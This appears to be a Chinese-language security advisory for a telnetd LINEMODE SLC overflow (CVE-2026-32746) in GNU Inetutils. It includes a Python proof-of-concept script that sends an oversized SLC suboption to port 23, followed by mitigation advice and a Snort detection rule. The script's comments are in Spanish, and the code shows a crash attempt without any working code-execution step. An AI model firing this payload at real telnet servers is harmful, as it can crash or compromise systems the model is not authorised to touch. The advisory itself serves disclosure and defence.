严重漏洞 | CVSS 9.8 | 远程代码执行!
影响范围: GNU Inetutils Telnetd(2.7 之前的版本)
类型: LINEMODE SLC 子选项处理器中的越界写入(OOB Write)
攻击向量: 网络(端口 23) | 无需身份验证
影响: 以 Telnetd 进程权限执行远程代码(RCE)
在 GNU Inetutils 的 telnetd 守护进程的 add_slc 函数中发现了一个越界写入(OOB Write)缓冲区溢出漏洞。该缺陷允许远程攻击者通过操纵 Telnet 协议的 SLC(设置本地字符)子选项来注入任意代码。
add_slc(本地字符处理)。攻击者可以通过恶意 Telnet 载荷利用此漏洞,使内部缓冲区溢出:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetición de 600 veces
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregado. Verificando caída del servicio/RCE...")
⚠️ ⚠️ 警告! 此代码仅用于教育和研究目的。在未经授权的系统上使用是非法的。
| 指标 | 值 | 描述 |
|---|---|---|
| 攻击向量 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 远程,无需身份验证 |
| 评分 | 9.8(严重) 🔴 | 对机密性、完整性和可用性造成高影响 |
| 发布时间 | 2026年3月13日 | 最后修改:2026年5月5日 |
✅ 将 GNU Inetutils 更新到已修补版本(2.7 之后)。
🔹 禁用 telnetd 并迁移到 SSH(推荐)。
🔹 在边界防火墙上阻止端口 23。
🔹 配置 IDS/IPS 以检测异常的 LINEMODE SLC 序列。
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)